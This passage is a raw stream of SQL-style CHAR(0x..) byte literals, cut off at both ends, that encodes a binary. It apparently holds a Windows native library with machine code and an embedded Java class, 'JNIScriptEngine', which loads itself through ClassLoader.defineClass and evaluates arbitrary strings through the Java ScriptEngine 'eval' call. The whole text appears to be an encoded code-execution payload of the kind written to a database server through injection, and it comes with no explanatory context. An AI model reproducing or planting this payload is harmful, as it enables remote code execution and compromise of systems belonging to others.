HAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0xea),CHAR(0x8a),CHAR(0x4d),CHAR(0x20),CHAR(0xe8),CHAR(0x8a),CHAR(0xfb),CHAR(0xff),CHAR(0xff),CHAR(0x90),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5d),CHAR(0xc3),CHAR(0xcc),CHAR(0x40),CHAR(0x55),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0xea),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5d),CHAR(0xe9),CHAR(0xeb),CHAR(0xf9),CHAR(0xff),CHAR(0xff),CHAR(0xcc),CHAR(0x40),CHAR(0x55),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0xea),CHAR(0x48),CHAR(0x8b),CHAR(0x01),CHAR(0x8b),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x28),CHAR(0x89),CHAR(0x54),CHAR(0x24),CHAR(0x20),CHAR(0x4c),CHAR(0x8d),CHAR(0x0d),CHAR(0x80),CHAR(0xf2),CHAR(0xff),CHAR(0xff),CHAR(0x4c),CHAR(0x8b),CHAR(0x45),CHAR(0x70),CHAR(0x8b),CHAR(0x55),CHAR(0x68),CHAR(0x48),CHAR(0x8b),CHAR(0x4d),CHAR(0x60),CHAR(0xe8),CHAR(0x2c),CHAR(0xf9),CHAR(0xff),CHAR(0xff),CHAR(0x90),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x30),CHAR(0x5d),CHAR(0xc3),CHAR(0xcc),CHAR(0x40),CHAR(0x55),CHAR(0x48),CHAR(0x8b),CHAR(0xea),CHAR(0x48),CHAR(0x8b),CHAR(0x01),CHAR(0x33),CHAR(0xc9),CHAR(0x81),CHAR(0x38),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x0f),CHAR(0x94),CHAR(0xc1),CHAR(0x8b),CHAR(0xc1),CHAR(0x5d),CHAR(0xc3),CHAR(0xcc),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb4),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xce),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe2),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xfe),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x7a),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa6),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xdc),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf2),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x14),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2c),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x68),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x74),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x82),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x94),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xae),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xd0),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xec),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x3e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x1d),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x1d),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x43),CHAR(0x6c),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x4c),CHAR(0x6f),CHAR(0x61),CHAR(0x64),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x28),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x43),CHAR(0x6c),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x4c),CHAR(0x6f),CHAR(0x61),CHAR(0x64),CHAR(0x65),CHAR(0x72),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x67),CHAR(0x65),CHAR(0x74),CHAR(0x53),CHAR(0x79),CHAR(0x73),CHAR(0x74),CHAR(0x65),CHAR(0x6d),CHAR(0x43),CHAR(0x6c),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x4c),CHAR(0x6f),CHAR(0x61),CHAR(0x64),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x28),CHAR(0x5b),CHAR(0x42),CHAR(0x49),CHAR(0x49),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x43),CHAR(0x6c),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x3b),CHAR(0x00),CHAR(0x64),CHAR(0x65),CHAR(0x66),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x43),CHAR(0x6c),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xca),CHAR(0xfe),CHAR(0xba),CHAR(0xbe),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x34),CHAR(0x00),CHAR(0x2e),CHAR(0x0a),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x03),CHAR(0x07),CHAR(0x00),CHAR(0x04),CHAR(0x0c),CHAR(0x00),CHAR(0x05),CHAR(0x00),CHAR(0x06),CHAR(0x01),CHAR(0x00),CHAR(0x10),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x4f),CHAR(0x62),CHAR(0x6a),CHAR(0x65),CHAR(0x63),CHAR(0x74),CHAR(0x01),CHAR(0x00),CHAR(0x06),CHAR(0x3c),CHAR(0x69),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x3e),CHAR(0x01),CHAR(0x00),CHAR(0x03),CHAR(0x28),CHAR(0x29),CHAR(0x56),CHAR(0x07),CHAR(0x00),CHAR(0x08),CHAR(0x01),CHAR(0x00),CHAR(0x20),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x78),CHAR(0x2f),CHAR(0x73),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x2f),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x4d),CHAR(0x61),CHAR(0x6e),CHAR(0x61),CHAR(0x67),CHAR(0x65),CHAR(0x72),CHAR(0x0a),CHAR(0x00),CHAR(0x07),CHAR(0x00),CHAR(0x03),CHAR(0x0a),CHAR(0x00),CHAR(0x07),CHAR(0x00),CHAR(0x0b),CHAR(0x0c),CHAR(0x00),CHAR(0x0c),CHAR(0x00),CHAR(0x0d),CHAR(0x01),CHAR(0x00),CHAR(0x12),CHAR(0x67),CHAR(0x65),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x46),CHAR(0x61),CHAR(0x63),CHAR(0x74),CHAR(0x6f),CHAR(0x72),CHAR(0x69),CHAR(0x65),CHAR(0x73),CHAR(0x01),CHAR(0x00),CHAR(0x12),CHAR(0x28),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x75),CHAR(0x74),CHAR(0x69),CHAR(0x6c),CHAR(0x2f),CHAR(0x4c),CHAR(0x69),CHAR(0x73),CHAR(0x74),CHAR(0x3b),CHAR(0x0b),CHAR(0x00),CHAR(0x0f),CHAR(0x00),CHAR(0x10),CHAR(0x07),CHAR(0x00),CHAR(0x11),CHAR(0x0c),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x13),CHAR(0x01),CHAR(0x00),CHAR(0x0e),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x75),CHAR(0x74),CHAR(0x69),CHAR(0x6c),CHAR(0x2f),CHAR(0x4c),CHAR(0x69),CHAR(0x73),CHAR(0x74),CHAR(0x01),CHAR(0x00),CHAR(0x03),CHAR(0x67),CHAR(0x65),CHAR(0x74),CHAR(0x01),CHAR(0x00),CHAR(0x15),CHAR(0x28),CHAR(0x49),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x4f),CHAR(0x62),CHAR(0x6a),CHAR(0x65),CHAR(0x63),CHAR(0x74),CHAR(0x3b),CHAR(0x07),CHAR(0x00),CHAR(0x15),CHAR(0x01),CHAR(0x00),CHAR(0x20),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x78),CHAR(0x2f),CHAR(0x73),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x2f),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x46),CHAR(0x61),CHAR(0x63),CHAR(0x74),CHAR(0x6f),CHAR(0x72),CHAR(0x79),CHAR(0x0b),CHAR(0x00),CHAR(0x14),CHAR(0x00),CHAR(0x17),CHAR(0x0c),CHAR(0x00),CHAR(0x18),CHAR(0x00),CHAR(0x19),CHAR(0x01),CHAR(0x00),CHAR(0x0f),CHAR(0x67),CHAR(0x65),CHAR(0x74),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x1d),CHAR(0x28),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x78),CHAR(0x2f),CHAR(0x73),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x2f),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x3b),CHAR(0x0b),CHAR(0x00),CHAR(0x1b),CHAR(0x00),CHAR(0x1c),CHAR(0x07),CHAR(0x00),CHAR(0x1d),CHAR(0x0c),CHAR(0x00),CHAR(0x1e),CHAR(0x00),CHAR(0x1f),CHAR(0x01),CHAR(0x00),CHAR(0x19),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x78),CHAR(0x2f),CHAR(0x73),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x2f),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x04),CHAR(0x65),CHAR(0x76),CHAR(0x61),CHAR(0x6c),CHAR(0x01),CHAR(0x00),CHAR(0x26),CHAR(0x28),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x53),CHAR(0x74),CHAR(0x72),CHAR(0x69),CHAR(0x6e),CHAR(0x67),CHAR(0x3b),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x4f),CHAR(0x62),CHAR(0x6a),CHAR(0x65),CHAR(0x63),CHAR(0x74),CHAR(0x3b),CHAR(0x0a),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x21),CHAR(0x0c),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x00),CHAR(0x23),CHAR(0x01),CHAR(0x00),CHAR(0x08),CHAR(0x74),CHAR(0x6f),CHAR(0x53),CHAR(0x74),CHAR(0x72),CHAR(0x69),CHAR(0x6e),CHAR(0x67),CHAR(0x01),CHAR(0x00),CHAR(0x14),CHAR(0x28),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x53),CHAR(0x74),CHAR(0x72),CHAR(0x69),CHAR(0x6e),CHAR(0x67),CHAR(0x3b),CHAR(0x07),CHAR(0x00),CHAR(0x25),CHAR(0x01),CHAR(0x00),CHAR(0x0f),CHAR(0x4a),CHAR(0x4e),CHAR(0x49),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x04),CHAR(0x43),CHAR(0x6f),CHAR(0x64),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x0f),CHAR(0x4c),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x4e),CHAR(0x75),CHAR(0x6d),CHAR(0x62),CHAR(0x65),CHAR(0x72),CHAR(0x54),CHAR(0x61),CHAR(0x62),CHAR(0x6c),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x26),CHAR(0x28),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x53),CHAR(0x74),CHAR(0x72),CHAR(0x69),CHAR(0x6e),CHAR(0x67),CHAR(0x3b),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x53),CHAR(0x74),CHAR(0x72),CHAR(0x69),CHAR(0x6e),CHAR(0x67),CHAR(0x3b),CHAR(0x01),CHAR(0x00),CHAR(0x0a),CHAR(0x45),CHAR(0x78),CHAR(0x63),CHAR(0x65),CHAR(0x70),CHAR(0x74),CHAR(0x69),CHAR(0x6f),CHAR(0x6e),CHAR(0x73),CHAR(0x07),CHAR(0x00),CHAR(0x2b),CHAR(0x01),CHAR(0x00),CHAR(0x13),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x45),CHAR(0x78),CHAR(0x63),CHAR(0x65),CHAR(0x70),CHAR(0x74),CHAR(0x69),CHAR(0x6f),CHAR(0x6e),CHAR(0x01),CHAR(0x00),CHAR(0x0a),CHAR(0x53),CHAR(0x6f),CHAR(0x75),CHAR(0x72),CHAR(0x63),CHAR(0x65),CHAR(0x46),CHAR(0x69),CHAR(0x6c),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x14),CHAR(0x4a),CHAR(0x4e),CHAR(0x49),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x2e),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x00),CHAR(0x21),CHAR(0x00),CHAR(0x24),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x05),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x26),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1d),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x05),CHAR(0x2a),CHAR(0xb7),CHAR(0x00),CHAR(0x01),CHAR(0xb1),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x09),CHAR(0x00),CHAR(0x1e),CHAR(0x00),CHAR(0x28),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x26),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x3a),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0xbb),CHAR(0x00),CHAR(0x07),CHAR(0x59),CHAR(0xb